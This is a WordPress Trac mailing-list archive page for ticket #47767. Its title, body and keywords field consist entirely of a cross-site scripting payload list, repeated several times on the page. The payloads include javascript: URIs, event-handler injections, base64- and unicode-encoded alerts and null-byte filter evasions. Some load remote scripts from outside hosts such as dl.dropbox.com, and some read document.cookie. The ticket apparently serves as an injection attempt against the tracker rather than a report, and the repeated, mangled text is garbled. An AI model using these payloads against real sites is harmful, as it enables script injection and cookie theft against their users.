[wp-trac] [WordPress Trac] #47767: <iframe %00 src="	 javascript:prompt(1)	 "%00> <svg><style>{font-family: '<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT: confirm( 1) " <sVg><scRipt %00>alert( 1) {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript: confirm(1)" <img src=`%00`
 onerror=alert(1)
 <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	 ></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html; 	 base64	 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ " > <h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg o n load=alert(1)>"> <meta content="
 1 
 ; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data: ,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0; url=javascript:confirm(1)"> <iframe src=javascript: alert( document. location) > <form><a href="javascript:\u0061lert( 1) ">X </script><img/*%00/src="worksinchrome: prompt( 1) "/%00*/onerror='eval(src)'> <img/	  src=`~` onerror=prompt(1)> <form><iframe 	  src="javascript: alert(1)" 	 ; > <a href="data:application/x-x509-user-cert; 
 base64
 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	  >X</a http://www.google<script .com>alert(document.location)</script <a  href= [ � ] "� onmouseover=prompt( 1) / / ">XYZ</a <img/src=@  onerror = prompt('1 ') <style/onload=prompt( 'X S S ') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style   ><script   :-(>/**/alert(document.location)/**/</script   :-( � </form><input type= "date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074( 1) '> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='< body onload=prompt( 1) > '> <a href="javascript:void(0)" onmouseover=
 javascript:alert(1)
 >X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=< !--	 > alert ( 1) > <///style///><span %2F onmousemove='alert( 1) '>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	 prompt(1) " > <svg><style>{-o-link-source: '<body/onload=confirm(1)>' <blink/ onmouseover=pro mpt (1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert( 1) '>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT: alert(1) //<form/action=javascript: alert( document. cookie) ><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src: '<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert( 1) {Opera} <a href="javascript: \u0061l e%72t( 1) "><button> <div onmouseover='alert( 1) '>DIV</div> <iframe style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT: alert( 1) ">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript: alert( document. cookie) >Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1); </script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j
 	 a
 	 	 v
 	 	 	 a
 	 	 	 	 s
 	 	 	 	 	 c
 	 	 	 	 	 	 r
 	 	 	 	 	 	 	 i
 	 	 	 	 	 	 	 	 p
 	 	 	 	 	 	 	 	 	 t
 	 	 	 	 	 	 	 	 	 	 : a
 	 	 	 	 	 	 	 	 	 	 	 l
 	 	 	 	 	 	 	 	 	 	 	 	 e
 	 	 	 	 	 	 	 	 	 	 	 	 	 r
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 t
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 28
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 1
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 %29></iframe> <svg><script ?>alert(1) <iframe src=j	 a	 v	 a	 s	 c	 r	 i	 p	 t	 :a	 l	 e	 r	 t	 %28	 1	 %29></iframe> <img src=`xx:xx`onerror=alert(1)> <meta http-equiv="refresh" content="0; javascript: alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html; base64_,<svg/onload=\u0061l e%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data: text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data: text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript: \u0061l e%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=< !--> 
alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//
 confirm(1); </script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript: alert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,a l e r t (1)></script> <div style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/'); > <form><button formaction=javascript: alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html; base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html; blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
WordPress Trac
noreply at wordpress.org
Tue Jul 23 22:00:04 UTC 2019
- Previous message (by thread): [wp-trac] [WordPress Trac] #47767: <iframe %00 src="	 javascript:prompt(1)	 "%00> <svg><style>{font-family: '<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT: confirm( 1) " <sVg><scRipt %00>alert( 1) {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript: confirm(1)" <img src=`%00`
 onerror=alert(1)
 <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	 ></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html; 	 base64	 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ " > <h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg o n load=alert(1)>"> <meta content="
 1 
 ; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data: ,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0; url=javascript:confirm(1)"> <iframe src=javascript: alert( document. location) > <form><a href="javascript:\u0061lert( 1) ">X </script><img/*%00/src="worksinchrome: prompt( 1) "/%00*/onerror='eval(src)'> <img/	  src=`~` onerror=prompt(1)> <form><iframe 	  src="javascript: alert(1)" 	 ; > <a href="data:application/x-x509-user-cert; 
 base64
 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	  >X</a http://www.google<script .com>alert(document.location)</script <a  href= [ � ] "� onmouseover=prompt( 1) / / ">XYZ</a <img/src=@  onerror = prompt('1 ') <style/onload=prompt( 'X S S ') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style   ><script   :-(>/**/alert(document.location)/**/</script   :-( � </form><input type= "date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074( 1) '> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='< body onload=prompt( 1) > '> <a href="javascript:void(0)" onmouseover=
 javascript:alert(1)
 >X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=< !--	 > alert ( 1) > <///style///><span %2F onmousemove='alert( 1) '>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	 prompt(1) " > <svg><style>{-o-link-source: '<body/onload=confirm(1)>' <blink/ onmouseover=pro mpt (1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert( 1) '>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT: alert(1) //<form/action=javascript: alert( document. cookie) ><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src: '<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert( 1) {Opera} <a href="javascript: \u0061l e%72t( 1) "><button> <div onmouseover='alert( 1) '>DIV</div> <iframe style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT: alert( 1) ">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript: alert( document. cookie) >Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1); </script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j
 	 a
 	 	 v
 	 	 	 a
 	 	 	 	 s
 	 	 	 	 	 c
 	 	 	 	 	 	 r
 	 	 	 	 	 	 	 i
 	 	 	 	 	 	 	 	 p
 	 	 	 	 	 	 	 	 	 t
 	 	 	 	 	 	 	 	 	 	 : a
 	 	 	 	 	 	 	 	 	 	 	 l
 	 	 	 	 	 	 	 	 	 	 	 	 e
 	 	 	 	 	 	 	 	 	 	 	 	 	 r
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 t
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 28
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 1
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 %29></iframe> <svg><script ?>alert(1) <iframe src=j	 a	 v	 a	 s	 c	 r	 i	 p	 t	 :a	 l	 e	 r	 t	 %28	 1	 %29></iframe> <img src=`xx:xx`onerror=alert(1)> <meta http-equiv="refresh" content="0; javascript: alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html; base64_,<svg/onload=\u0061l e%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data: text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data: text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript: \u0061l e%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=< !--> 
alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//
 confirm(1); </script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript: alert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,a l e r t (1)></script> <div style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/'); > <form><button formaction=javascript: alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html; base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html; blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
- Next message (by thread): [wp-trac] [WordPress Trac] #47767: <iframe %00 src="	 javascript:prompt(1)	 "%00> <svg><style>{font-family: '<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT: confirm( 1) " <sVg><scRipt %00>alert( 1) {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript: confirm(1)" <img src=`%00`
 onerror=alert(1)
 <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	 ></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html; 	 base64	 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ " > <h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg o n load=alert(1)>"> <meta content="
 1 
 ; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data: ,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0; url=javascript:confirm(1)"> <iframe src=javascript: alert( document. location) > <form><a href="javascript:\u0061lert( 1) ">X </script><img/*%00/src="worksinchrome: prompt( 1) "/%00*/onerror='eval(src)'> <img/	  src=`~` onerror=prompt(1)> <form><iframe 	  src="javascript: alert(1)" 	 ; > <a href="data:application/x-x509-user-cert; 
 base64
 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	  >X</a http://www.google<script .com>alert(document.location)</script <a  href= [ � ] "� onmouseover=prompt( 1) / / ">XYZ</a <img/src=@  onerror = prompt('1 ') <style/onload=prompt( 'X S S ') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style   ><script   :-(>/**/alert(document.location)/**/</script   :-( � </form><input type= "date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074( 1) '> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='< body onload=prompt( 1) > '> <a href="javascript:void(0)" onmouseover=
 javascript:alert(1)
 >X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=< !--	 > alert ( 1) > <///style///><span %2F onmousemove='alert( 1) '>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	 prompt(1) " > <svg><style>{-o-link-source: '<body/onload=confirm(1)>' <blink/ onmouseover=pro mpt (1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert( 1) '>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT: alert(1) //<form/action=javascript: alert( document. cookie) ><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src: '<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert( 1) {Opera} <a href="javascript: \u0061l e%72t( 1) "><button> <div onmouseover='alert( 1) '>DIV</div> <iframe style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT: alert( 1) ">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript: alert( document. cookie) >Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1); </script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j
 	 a
 	 	 v
 	 	 	 a
 	 	 	 	 s
 	 	 	 	 	 c
 	 	 	 	 	 	 r
 	 	 	 	 	 	 	 i
 	 	 	 	 	 	 	 	 p
 	 	 	 	 	 	 	 	 	 t
 	 	 	 	 	 	 	 	 	 	 : a
 	 	 	 	 	 	 	 	 	 	 	 l
 	 	 	 	 	 	 	 	 	 	 	 	 e
 	 	 	 	 	 	 	 	 	 	 	 	 	 r
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 t
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 28
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 1
 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 	 %29></iframe> <svg><script ?>alert(1) <iframe src=j	 a	 v	 a	 s	 c	 r	 i	 p	 t	 :a	 l	 e	 r	 t	 %28	 1	 %29></iframe> <img src=`xx:xx`onerror=alert(1)> <meta http-equiv="refresh" content="0; javascript: alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html; base64_,<svg/onload=\u0061l e%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data: text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data: text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript: \u0061l e%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=< !--> 
alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//
 confirm(1); </script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript: alert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,a l e r t (1)></script> <div style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/'); > <form><button formaction=javascript: alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html; base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html; blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
- Messages sorted by:
[ date ]
[ thread ]
[ subject ]
[ author ]
#47767: <iframe %00 src=" javascript:prompt(1) "%00> <svg><style>{font-
family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)" <sVg><scRipt
%00>alert(1) {Opera} <img/src=`%00`
onerror=this.onerror=confirm(1) <form><isindex
formaction="javascript:confirm(1)" <img src=`%00`
onerror=alert(1)
<script/
src='https://dl.dropbox.com/u/13018058/js.js' / ></script> <ScRipT
5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>"> <meta
content="
1
; JAVASCRIPT: alert(1)" http-
equiv="refresh"/> <svg><script
xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe
src=javascript:alert(document.location)> <form><a
href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
<img/
� src=`~` onerror=prompt(1)> <form><iframe
� src="javascript:alert(1)"�
;> <a
href="data:application/x-x509-user-
cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
�>X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"�
onmouseover=prompt(1)//">XYZ</a <img/src=@
onerror = prompt('1') <style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^ </style
><script :-(>/**/alert(document.location)/**/</script :-(
�</form><input type="date" onfocus="alert(1)"> <form><textarea
onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <script
/***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script
/***/ <iframe srcdoc='<body onload=prompt(1)>'> <a
href="javascript:void(0)"
onmouseover=
javascript:alert(1)
>X</a> <script
~~~>alert(0%0)</script ~~~>
<style/onload=<!-- >
alert
(1)>
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover= prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/
onmouseover=prompt(1)>OnMouseOver {Firefox &
Opera} <marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/
src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\
</script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript:
javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script
'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a
href="javascript:\u0061le%72t(1)"><button> <div
onmouseover='alert(1)'>DIV</div> <iframe
style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)"> <a
href="jAvAsCrIpT:alert(1)">X</a> <embed
src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object
data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var> <a
href=javascript:alert(document.cookie)>Click
Here</a> <img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script --> <script
src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload =
prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1) <input type="text"
value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com <iframe
src=j
a
v
a
s
c
r
i
p
t
:a
l
e
r
t
28
1
%29></iframe>
<svg><script ?>alert(1) <iframe
src=j a v a s c r i p t :a l e r t %28 1 %29></iframe>
<img src=`xx:xx`onerror=alert(1)> <meta http-equiv="refresh"
content="0;javascript:alert(1)"/> <math><a
xlink:href="//jsfiddle.net/t846h/">click <embed
code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1 <a
href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')
worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~
\u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script
U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
<object data=javascript:\u0061le%72t(1)>
<script>+-+-1-+-+alert(1)</script> <body/onload=<!-->
alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script <img src
?itworksonchrome?\/onerror = alert(1)
<svg><script>//
confirm(1);</script </svg> <svg><script
onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa
aaaaaaaa aaaaaaaaa aaaaaaaaaa
href=javascript:alert(1)>ClickMe <script x> alert(1)
</script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=`
onerror=alert(1)> --!>
<script/src=data:text/javascript,alert(1)></script>
<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x
onerror=window.open('https://www.google.com/');> <form><button
formaction=javascript:alert(1)>CLICKME <math><a
xlink:href="//jsfiddle.net/t846h/">click <object
data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe
src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<a
href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click
Me</a>
-------------------------------------------------+-------------------------
Reporter: bugbounty00 | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting
| Review
Component: General | Version:
Severity: normal | Resolution:
Keywords: <iframe %00 | Focuses:
src=" javascript:prompt(1) "%00> |
<svg><style>{font- |
family:'<iframe/onload=confirm(1)>' |
<input/onmouseover="javaSCRIPT:confirm(1)"|
<sVg><scRipt %00>alert(1) {Opera} |
<img/src=`%00` |
onerror=this.onerror=confirm(1) |
<form><isindex |
formaction="javascript:confirm(1)" <img |
src=`%00`
onerror=alert(1)
|
<script/ |
src='https://dl.dropbox.com/u/13018058/js.js' |
/ ></script> <ScRipT |
5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? |
<iframe/src="data:text/html; base64 |
PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script |
/*%00*/>/*%00*/alert(1)/*%00*/</script |
/*%00*/ |
"><h1/onmouseover='\u0061lert(1)'>%00 |
<iframe/src="data:text/html <svg |
onload=alert(1)>"> <meta |
content="
1
; |
JAVASCRIPT: alert(1)" http- |
equiv="refresh"/> <svg><script |
xlink:href=data: |
window.open('https://www.google.com/')></script|
<svg><script |
x:href='https://dl.dropbox.com/u/13018058/js.js'|
{Opera} <meta http-equiv="refresh" |
content="0;url=javascript:confirm(1)"> |
<iframe |
src=javascript:alert(document.location)>|
<form><a |
href="javascript:\u0061lert(1)">X |
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>|
<img/
� src=`~` |
onerror=prompt(1)> <form><iframe |
� |
src="javascript:alert(1)"�
;> |
<a href="data:application/x-x509-user- |
cert;
base64
|
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
�>X</a|
http://www.google<script |
.com>alert(document.location)</script |
<a href=[�]"� |
onmouseover=prompt(1)//">XYZ</a|
<img/src=@
onerror = |
prompt('1') |
<style/onload=prompt('XSS')|
<script |
^__^>alert(String.fromCharCode(49))</script |
^__^ </style ><script |
:-(>/**/alert(document.location)/**/</script |
:-( �</form><input type="date" |
onfocus="alert(1)"> <form><textarea
|
onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>|
<script |
/***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script|
